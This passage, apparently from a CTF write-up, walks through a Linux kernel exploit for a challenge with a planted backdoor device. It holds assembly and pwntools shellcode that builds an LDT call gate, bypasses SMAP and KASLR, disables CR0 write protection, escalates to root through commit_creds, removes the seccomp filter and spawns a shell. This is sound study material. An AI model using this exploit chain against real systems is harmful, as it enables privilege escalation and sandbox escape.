0x3   0 0 1 1    16-bit TSS (Busy)       Reserved
0x4   0 1 0 0    16-bit Call Gate        Reserved
0x5   0 1 0 1    Task Gate               Reserved
0x6   0 1 1 0    16-bit Interrupt Gate   Reserved
0x7   0 1 1 1    16-bit Trap Gate        Reserved
0x8   1 0 0 0    Reserved                Reserved
0x9   1 0 0 1    32-bit TSS (Available)  64-bit TSS (Available)
0xa   1 0 1 0    Reserved                Reserved
0xb   1 0 1 1    32-bit TSS (Busy)       64-bit TSS (Busy)
0xc   1 1 0 0    32-bit Call Gate        64-bit Call Gate
0xd   1 1 0 1    Reserved                Reserved
0xe   1 1 1 0    32-bit Interrupt Gate   64-bit Interrupt Gate
0xf   1 1 1 1    32-bit Trap Gate        64-bit Trap Gate

And the backdoor created a 64-bit Call Gate for us.
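In IA-32e mode a call gate is 16 bytes, so it spans our entry 12 and the following entry 13: entry 12 provides offset[31:0], the target selector, and the access byte; entry 13 provides offset[63:32] and must have zero type bits. That is presumably why the PoC below creates entry 14 (high_desc), which leaves entry 13 zeroed. The sketch below decodes such a gate. The input qword 0x00c0ec0000100000 is my own hand computation of the PoC's user_desc (base_addr = __KERNEL_CS = 0x10, limit = 0x1000, seg_32bit = 1) after the backdoor's writes. It shows that the gate jumps to __KERNEL_CS:0xc00000, which matches the PoC linking its .text at 0xc00000. Function names are hypothetical.

```python
import struct

LDT_SELECTOR, RPL_USER = 0b100, 0b011


def selector(entry: int) -> int:
    """Selector for an LDT entry: index << 3 | TI=1 (LDT) | RPL 3."""
    return (entry << 3) | LDT_SELECTOR | RPL_USER


def decode_call_gate(lo: bytes, hi: bytes) -> dict:
    """Read two consecutive 8-byte LDT entries as one 16-byte 64-bit call gate."""
    off_lo, sel, _reserved, attr, off_mid = struct.unpack("<HHBBH", lo)
    off_hi, upper = struct.unpack("<II", hi)
    return {
        "selector": sel,
        "offset": (off_hi << 32) | (off_mid << 16) | off_lo,
        "type": attr & 0xF, "s": (attr >> 4) & 1,
        "dpl": (attr >> 5) & 3, "p": attr >> 7,
        "upper_type": (upper >> 8) & 0x1F,  # must be 0 in the second half
    }


def far_pointer(raw: bytes) -> tuple:
    """Decode an m16:32 far pointer (as used by `call FWORD PTR`): offset, selector."""
    return struct.unpack("<IH", raw[:6])
```

Calling through the gate uses a far pointer whose selector is `selector(12) == 0x67`; the offset part (0xdead8664 in the PoC) is ignored by the CPU when the selector names a call gate.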

Stage 4: kernel backdoor, LDT call gate

A call gate is an x86 feature that allows controlled switching between privilege levels, similar to how syscalls enter the kernel (e.g. through interrupt gates).

After realizing this, we found this super cool writeup by hlt about his challenge one_byte from hxp 2022. It uses a call gate to get CPL 0 (ring 0) code execution, and gets around SMAP by setting EFLAGS.AC from userland (the "stac in CPL3" trick).

Note: this wouldn't work if SMEP was enabled: the call gate jumps to our code in a user page, and unlike SMAP, which EFLAGS.AC overrides, SMEP can't be temporarily disabled without direct access to CR4, afaik.

With a few adjustments we can create a privilege escalation PoC:

Diff from the one_byte solution:

1c1,2
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
---
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
> 
91,94d91
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
96c93,97
< // TODO: Check that &ring0 == 0x401000
---
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
> 
> 
> // TODO: Check that &ring0 == 0xc00000
136,142c137,155
<     // Set current->cred and current->real_cred to init_task->cred
<     addq $KASLR_INIT_TASK, %rdx
<     movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
<     addl $2, STRUCT_CRED_USAGE(%rdx)
<     movq %gs:PERCPU_CURRENT, %rax
<     movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
<     movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
---
>     // get .text base
>     subq $(KASLR_WRITE_TO+0x400000), %rdi
>     andq $(~0xfffff), %rdi
>     movq %rdi, %r15
>     
>     // privilige escalation
>     // crpt_cred = prepare_cred();
> 
>     lea PREPARE_CREDS(%r15), %rax
>     call *%rax
> 
>     // crpt_cred.uid = 0;
>     // crpt_cred.gid = 0;
>     movq %rax, %rdi
>     movq $0, 8(%rdi)
> 
>     // commit_creds(crpt_cred);
>     lea COMMIT_CREDS(%r15), %rax
>     call *%rax
204c217
< asciz module_path, "/dev/one_byte"
---
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
256c269,270
<     exit_64 $0
---
>     movq $0, %rdi
>     check_syscall_64 $SYS_exit
258a273
>

Privilege escalation PoC:

// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn


#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
    negl %eax
    movl $SYS_exit_group, %eax
    syscall
    ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
    movl \nr, %eax
    syscall
    test \res, \res
    js __syscall_64_fail.L
.endm

.macro var name:req
    .pushsection .data
    .balign 8
    .local \name
    \name:
.endm

.macro endvar name:req
    .local end_\name
    end_\name:
    .eqv sizeof_\name, end_\name - \name
    .popsection
.endm

.macro asciz name:req, data:vararg
    var \name
        .asciz \data
    endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
    var \name
        .int \offset
        .short \selector
    endvar \name
.endm

.macro fn name:req
    .text
    .code64
    .global \name
    \name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS   (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL   0b000
#define RPL_USER     0b011
#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             |||  \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0


// TODO: Check that &ring0 == 0xc00000
fn ring0
    // Disable interrupts (interrupts cause double faults right now)
    cli

    // Read LSTAR to bypass KASLR
    movl $MSR_LSTAR,  %ecx
    rdmsr
    shlq $32, %rdx
    orq %rax, %rdx
    subq $KASLR_LSTAR, %rdx
    movq %rdx, %rbp

    // Disable WP
    movq %cr0, %r8
    andq $(~(1 << 16)), %r8
    movq %r8, %cr0

    // Copy stage 2 to the mapped kernel entry point
    movq %rbp, %rdi
    addq $KASLR_WRITE_TO, %rdi
    movq %rdi, %r15
    leaq ring0_stage2(%rip), %rsi
    movl $sizeof_ring0_stage2, %ecx
    rep movsb

    // Jump there.
    jmp *%r15

var ring0_stage2
    // Get access to per-cpu variables (current, mostly) via swapgs
    swapgs

    // Get the current page table.
    movq %cr3, %rbx

    // Switch to the kernel page table.
    andq $(~PTI_SWITCH_MASK), %rbx
    movq %rbx, %cr3

    // get .text base
    subq $(KASLR_WRITE_TO+0x400000), %rdi
    andq $(~0xfffff), %rdi
    movq %rdi, %r15

    // privilege escalation
    // crpt_cred = prepare_creds();

    lea PREPARE_CREDS(%r15), %rax
    call *%rax

    // crpt_cred.uid = 0;
    // crpt_cred.gid = 0;
    movq %rax, %rdi
    movq $0, 8(%rdi)

    // commit_creds(crpt_cred);
    lea COMMIT_CREDS(%r15), %rax
    call *%rax

    // Swap back
    swapgs

    // Switch the page table back around
    orq $PTI_SWITCH_MASK, %rbx
    movq %rbx, %cr3

    // Build an `iret` stackframe rather than a `ret far` stack frame.
    popq %r8 // => %rip
    popq %r9 // => %cs
    pushfq
    orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
    pushq %r9
    pushq %r8
    iretq
endvar ring0_stage2

var user_desc
    // base2 (base_addr[31:24]) == cs_offset[31:24]
    // limit_in_pages           == cs_offset[23]
    // seg_32bit                == cs_offset[22]
    // NB: Because lm is ignored, cs_offset[21] must be 0
    // useable                  == cs_offset[20]
    // limit1 (limit[19:16])    == cs_offset[19:16]
    // flags0                   == (arbitrary, will be overwritten later)
    // base1 (base_addr[23:16]) == (ignored entirely)
    // base0 (base_addr[15:0])  == __KERNEL_CS
    // limit0 (limit[15:0])     == cs_offset[15:0]
    .int TARGET_ENTRY // entry_number
    .int __KERNEL_CS  // base_addr
    .int 0x01000      // limit
    .int 0b00000001   // flags (int because of padding - only the low byte is actually used)
    //     |||||\/\____  .seg_32bit (D) (must be 1 for set_thread_area)
    //     ||||| \_____  .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
    //     ||||\_______  .read_exec_only (!R)
    //     |||\________  .limit_in_pages (G)
    //     ||\_________  .seg_not_present (!P)
    //     |\__________  .useable (AV)
    //     \___________  .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
//     base2 (base_addr[31:24]) == (ignored)
//     flags1                   == (ignored)
//     limit1 (limit[19:16])    == (ignored)
//     flags0                   == (mostly ignored, except for the type)
//     base1 (base_addr[23:16]) == (ignored)
//     base0 (base_addr[15:0])  == cs_offset[63:48]
//     limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
    // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
    // above the target descriptor).
    .int TARGET_ENTRY + 2 // entry_number
    .int 0xffff           // base_addr
    .int 0xffff           // limit
    .int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
    .quad shell_path
    .quad 0
endvar shell_argv

var module_message
    .quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
    .byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
    movl $sizeof_\desc, %edx
    leaq \desc(%rip), %rsi
    movl $0x11, %edi
    check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
    // Open device
    xorl %edx, %edx
    movl $O_WRONLY, %esi
    leaq module_path(%rip), %rdi
    check_syscall_64 $SYS_open
    movl %eax, %r15d

    // "stac" in CPL3
    pushfq
    orq $(1 << 18), (%rsp)
    popfq

    // Update the LDT
    modify_ldt user_desc
    modify_ldt high_desc

    // Trigger the overwrite
    movl $sizeof_module_message, %edx
    leaq module_message(%rip), %rsi
    movl %r15d, %edi
    check_syscall_64 $SYS_write

    // Go to CPL 0
    far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
    lcall *(gate_target)

    // Get a shell
    leaq shell_path(%rip), %rdi
    leaq shell_argv(%rip), %rsi
    xorl %edx, %edx
    check_syscall_64 $SYS_execve
    movq $0, %rdi
    check_syscall_64 $SYS_exit

// vim:syntax=asm:

So let's rewrite this as a Python (pwntools) payload.
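The magic constants in the stage 4 payload (0x100001000 / 0x100000000c and 0x380000FFFF / 0xFFFF0000000E) are just the PoC's user_desc and high_desc structs, pushed onto the stack as two qwords each. This sketch (hypothetical helper names) rebuilds them, assuming GCC's LSB-first bitfield layout on x86-64, where all user_desc flags share one 32-bit word.

```python
import struct


def pack_user_desc(entry_number, base_addr, limit, seg_32bit=0, contents=0,
                   read_exec_only=0, limit_in_pages=0, seg_not_present=0,
                   useable=0, lm=0) -> bytes:
    """struct user_desc as passed to modify_ldt: 4 x u32, flags LSB-first."""
    flags = (seg_32bit | contents << 1 | read_exec_only << 3 | limit_in_pages << 4
             | seg_not_present << 5 | useable << 6 | lm << 7)
    return struct.pack("<IIII", entry_number, base_addr, limit, flags)


def as_pushes(desc: bytes) -> list:
    """Qwords in push order: the high half first, so the low half ends up at rsp."""
    lo, hi = struct.unpack("<QQ", desc)
    return [hi, lo]


# PoC values: user_desc (entry 12) and high_desc (entry 14)
USER = pack_user_desc(12, 0x10, 0x1000, seg_32bit=1)
HIGH = pack_user_desc(14, 0xFFFF, 0xFFFF, read_exec_only=1,
                      limit_in_pages=1, seg_not_present=1)
```

`as_pushes(USER)` yields `[0x100001000, 0x100000000c]` and `as_pushes(HIGH)` yields `[0x380000ffff, 0xffff0000000e]`, the same values the shellcode pushes before each modify_ldt call with rdx = 0x10.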

Stage 4:

trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.pushstr("/dev/i_am_definitely_not_backdoor")}
  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}
  syscall
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}

  syscall
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] write to backdoor\n")}
  {shc.pushstr('TEST')}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

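  // call CALL GATE for privilege escalation
  // PIVOT-0xa6b00 == PAYLOAD (0x401000), where far_func (offset 0xdead8664, selector 0x67) is stored
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}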

  // should be root
  {shc.echo("[+] spawning shell\n")}
  {shc.sh()}

  {shc.echo("[+] END\n")}
  int 3

FAIL:
  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

TRAMPOLIN:
""") + trampolin)

Stage 5.1: call gate trampoline

The trampoline stays the same as in the one_byte writeup.

Stage 5.1:

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_WRITE_TO=0xbad000 # used by the trampoline below, same value as in the PoC
KASLR_INIT_TASK=0x1613940
PERCPU_CURRENT=0x1fbc0

ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""
  cli

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

  RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)
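The trampoline's arithmetic is simple enough to replay outside the kernel: the KASLR base is MSR_LSTAR minus a fixed offset, the ring 0 stage is copied to base + KASLR_WRITE_TO, and CR0.WP (bit 16) is cleared so ring 0 may write to the read-only kernel text. This is a sketch with a hypothetical function name; the example inputs in the usage note (a kernel at the default 0xffffffff81000000 base and CR0 = 0x80050033) are assumed values, not values observed on the challenge.

```python
KASLR_LSTAR = 0xA00010     # offset of the LSTAR target from the kernel base (PoC constant)
KASLR_WRITE_TO = 0xBAD000  # where the ring 0 stage gets copied (PoC constant)
CR0_WP = 1 << 16           # CR0.WP: when set, ring 0 can't write read-only pages


def trampoline_math(lstar: int, cr0: int) -> dict:
    """Replay the trampoline's arithmetic for given MSR_LSTAR and CR0 values."""
    kbase = lstar - KASLR_LSTAR                # rdmsr; shl/or into rdx; sub rdx, KASLR_LSTAR
    return {
        "kbase": kbase,
        "write_to": kbase + KASLR_WRITE_TO,    # destination of `rep movsb`
        "cr0": cr0 & ~CR0_WP,                  # and r8, ~(1 << 16); mov cr0, r8
    }
```

For example, `trampoline_math(0xffffffff81a00010, 0x80050033)` gives a base of 0xffffffff81000000, a copy destination of 0xffffffff81bad000 and CR0 = 0x80040033.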

Sandbox (Seccomp)

Finally, let's write shellcode to disable seccomp.

Stage 5.2: ring 0 payload

For ring 0 we need to make some adjustments. The privilege escalation stays the same as in our PoC, but we also have to find a way to disable seccomp. We found this writeup about disabling seccomp, but it isn't helpful anymore, because the x86 Linux kernel changed the way seccomp works in newer versions. Still, it gives us an important starting point: current (the task_struct of the running task).

Let's first look at task_struct, which embeds a struct called seccomp:

include/uapi/linux/seccomp.h:

/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED   0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Note: SECCOMP_MODE_DISABLED is not a valid mode to set using prctl (see the source code).

include/linux/sched.h:

struct seccomp {
    int mode;
    atomic_t filter_count;
    struct seccomp_filter *filter;
};

So can we just manually set the mode to SECCOMP_MODE_DISABLED? ... No. I also tried overwriting other fields of the seccomp struct, but none of that worked either. OK, let's go deeper down the rabbit hole and look at seccomp_filter:

kernel/seccomp.c:

struct seccomp_filter {
    refcount_t refs;
    refcount_t users;
    bool log;
    bool wait_killable_recv;
    struct action_cache cache;
    struct seccomp_filter *prev;
    struct bpf_prog *prog;
    struct notification *notif;
    struct mutex notify_lock;
    wait_queue_head_t wqh;
};

No luck here either; manually patching the instructions of the bpf_prog didn't work.

Note: I didn't try messing with the flags (e.g. to disable jited), so that might have worked.

So what now? Well, looking at the seccomp_filter struct we see a member called prev. Interesting, so let's look at the source code for adding seccomp filters:

Basically, the seccomp filters form a singly linked list: a newly added filter becomes the new head (current->seccomp.filter), and its prev pointer links to the previously installed filter.
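To make the list structure concrete, here is a rough Python model loosely following seccomp_attach_filter() in kernel/seccomp.c. It is simplified: no locking, refcounting, action cache or thread sync. The class and function names are our own.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class SeccompFilter:
    name: str
    prev: Optional["SeccompFilter"] = None    # older filter, like seccomp_filter->prev

@dataclass
class Seccomp:
    filter_count: int = 0
    filter: Optional[SeccompFilter] = None    # head: the most recently attached filter

def attach_filter(sc: Seccomp, f: SeccompFilter) -> None:
    # the new filter points at the old head and then becomes the new head
    f.prev = sc.filter
    sc.filter = f
    sc.filter_count += 1

def chain(sc: Seccomp) -> list[str]:
    # walk the list from newest to oldest via prev
    names, f = [], sc.filter
    while f is not None:
        names.append(f.name)
        f = f.prev
    return names

sc = Seccomp()
attach_filter(sc, SeccompFilter("challenge"))
attach_filter(sc, SeccompFilter("allow_all"))
print(chain(sc), sc.filter_count)   # ['allow_all', 'challenge'] 2
```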

So let's first try to add a simple rule that allows everything:

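#include <assert.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>

// one BPF instruction: unconditionally return SECCOMP_RET_ALLOW
#define ALLOW_PROCESS \
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)

void allow_all(void) {
    struct sock_filter seccomp_filter[] = {
        ALLOW_PROCESS,
    };

    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
        .filter = seccomp_filter,
    };

    // unprivileged tasks must set no_new_privs before installing a filter;
    // the calls stay outside assert() so they still run with NDEBUG
    int ret = prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
    assert(ret != -1);
    ret = prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
    assert(ret != -1);
}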

This creates a struct sock_fprog (a length and a pointer to a single sock_filter) that looks like this in memory:

00:0000│ rdx rsp 0x7fffffffe750 ◂— 1
01:0008│-018     0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010│-010     0x7fffffffe760 ◂— 0x7fff000000000006

In the ring 0 payload, we then add it by calling do_seccomp directly.
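The fake struct can also be built without a C compiler, which is how it ends up in the stage 5.2 payload. A minimal sketch with Python's struct module, assuming x86_64 (little endian, 8-byte pointers). As in the Stage 5.2 listing (`mov rdx, {PAYLOAD+0x8}`), it also assumes the struct sits at PAYLOAD+0x8.

```python
import struct

BPF_RET, BPF_K = 0x06, 0x00
SECCOMP_RET_ALLOW = 0x7FFF0000
PAYLOAD = 0x401000

def sock_filter(code: int, jt: int, jf: int, k: int) -> bytes:
    # struct sock_filter { __u16 code; __u8 jt; __u8 jf; __u32 k; }
    return struct.pack("<HBBI", code, jt, jf, k)

def sock_fprog(length: int, filter_ptr: int) -> bytes:
    # struct sock_fprog { unsigned short len; /* 6 bytes padding */ struct sock_filter *filter; }
    return struct.pack("<H6xQ", length, filter_ptr)

allow = sock_filter(BPF_RET | BPF_K, 0, 0, SECCOMP_RET_ALLOW)
fprog_addr = PAYLOAD + 0x8
fake = sock_fprog(1, fprog_addr + 0x10) + allow   # filter array directly follows

print(hex(struct.unpack("<Q", allow)[0]))         # 0x7fff000000000006
print([hex(q) for q in struct.unpack("<3Q", fake)])
```

The three qwords match both the gdb dump and the `flat(1, PAYLOAD+0x18, 0x7fff000000000006)` used in the exploit.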

This added our rule to the head of the linked list and incremented filter_count, but we still can't call the blocked syscalls. This is because all filters in the list are evaluated and, according to the seccomp(2) man page, SECCOMP_RET_KILL_PROCESS takes precedence over SECCOMP_RET_ALLOW.

What we can do now, though, is manually reduce seccomp.filter_count to 1 and unlink the original filter by setting seccomp.filter->prev = NULL. With only our allow-all filter left, we have successfully disabled seccomp.
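The following small Python model of seccomp_run_filters() shows why the extra filter alone is not enough and why unlinking prev fixes it. Every filter in the list runs, and the action with the lowest signed value (ACTION_ONLY) wins. The challenge filter here is a hypothetical stand-in (allow read/write, kill everything else), not the real rule set.

```python
SECCOMP_RET_KILL_PROCESS = 0x80000000
SECCOMP_RET_ALLOW = 0x7FFF0000
SECCOMP_RET_ACTION_FULL = 0xFFFF0000

def action_only(ret: int) -> int:
    # (s32)(ret & SECCOMP_RET_ACTION_FULL): KILL_PROCESS becomes negative
    v = ret & SECCOMP_RET_ACTION_FULL
    return v - (1 << 32) if v & 0x80000000 else v

class Filter:
    def __init__(self, prog, prev=None):
        self.prog = prog     # callable: syscall number -> action
        self.prev = prev

def run_filters(head: Filter, nr: int) -> int:
    ret = SECCOMP_RET_ALLOW
    f = head
    while f is not None:                    # newest to oldest
        cur = f.prog(nr)
        if action_only(cur) < action_only(ret):
            ret = cur                       # the more restrictive action wins
        f = f.prev
    return ret

SYS_read, SYS_write, SYS_execve = 0, 1, 59
challenge = Filter(lambda nr: SECCOMP_RET_ALLOW if nr in (SYS_read, SYS_write)
                   else SECCOMP_RET_KILL_PROCESS)
allow_all = Filter(lambda nr: SECCOMP_RET_ALLOW, prev=challenge)

print(hex(run_filters(allow_all, SYS_execve)))   # 0x80000000: still killed
allow_all.prev = None                            # what the ring 0 payload does
print(hex(run_filters(allow_all, SYS_execve)))   # 0x7fff0000: allowed
```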

Stage 5.2:

PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
 1, # size
 PAYLOAD+0x18, # args (ptr to rules)
 0x7fff000000000006, # rules (RETURN ALLOW)
)


PTI_SWITCH_MASK=0x1000

KASLR_WRITE_TO=0xbad000

# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0

SECCOMP_SET_MODE_FILTER=1

# current struct offset from gs
CURRENT=0x34940

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // and rdi, {~0xffffff}
  sub rdi, {KASLR_WRITE_TO +0x400000}
  and rdi, {~0xfffff}
  mov r15, rdi

  // add fake seccomp filter, allow all
  lea rax, [r15+{DO_SECCOMP}]
  mov rdi, {SECCOMP_SET_MODE_FILTER}
  xor rsi, rsi
  mov rdx, {PAYLOAD+0x8}
  call rax

  // privilege escalation
  // crpt_cred = prepare_creds();

  lea rax, [r15+{PREP_CRED}]
  call rax

  // crpt_cred.uid = 0;
  // crpt_cred.gid = 0;
  mov rdi, rax
  movq [rdi+8], 0

  // commit_creds(crpt_cred);
  lea rax, [r15+{COMMIT_CRED}]
  call rax

  // DISABLE SECCOMP

  // get current
  movq rax, qword ptr gs:[{CURRENT}]

  // current->seccomp.filter_count = 1 (was 2: our fake filter and the initial one)
  mov dword ptr[rax+0xc6c], 1

  // get current->seccomp.filter
  mov rax, qword ptr[rax+0xc70]
  // current->seccomp.filter->prev = NULL
  mov qword ptr[rax+0x90], 0

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq

""")

Final stage: get flag

At this point everything should be straightforward. Sadly, while this version worked, it had a pretty bad success rate, probably because the kernel function calls re-enable interrupts, as mentioned in the one_byte writeup. Still, this exploit was good enough to get the flag.

/root/flag.txt

NOPE <3
Please get a full root shell
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣆⡐⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⢿⠿⠿⠿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣸⣮⢰⣄⣸⡇⠄⠀⠠⠀⠀⠀⠀⢀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⡗⡽⠤⠉⣹⠇⠀⠁⡄⠀⠀⡀⠀⠀⠁⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⢴⣫⣝⣉⣽⡁⠀⠀⠀⠇⠀⠈⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠁⣲⡵⢻⣧⡎⡰⢋⣷⣤⣔⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠐⠄⠀⢀⣠⣶⣿⣿⣅⣺⣿⡋⢀⣾⣿⣿⣿⣿⣿⣿⣆⠀⠃⢀⠎⠀⠀⠀
⠀⠀⠀⠀⠀⠐⠀⠈⠂⠀⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠈⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢃⠀⠃⢈⣿⣿⣿⣿⣿⣏⢸⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣋⠝⣿⣿⣿⣿⣿⣿⣷⣄⠃⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣭⣽⣘⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠀⢸⣿⣿⣭⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⠿⠟⠀⡀⠀
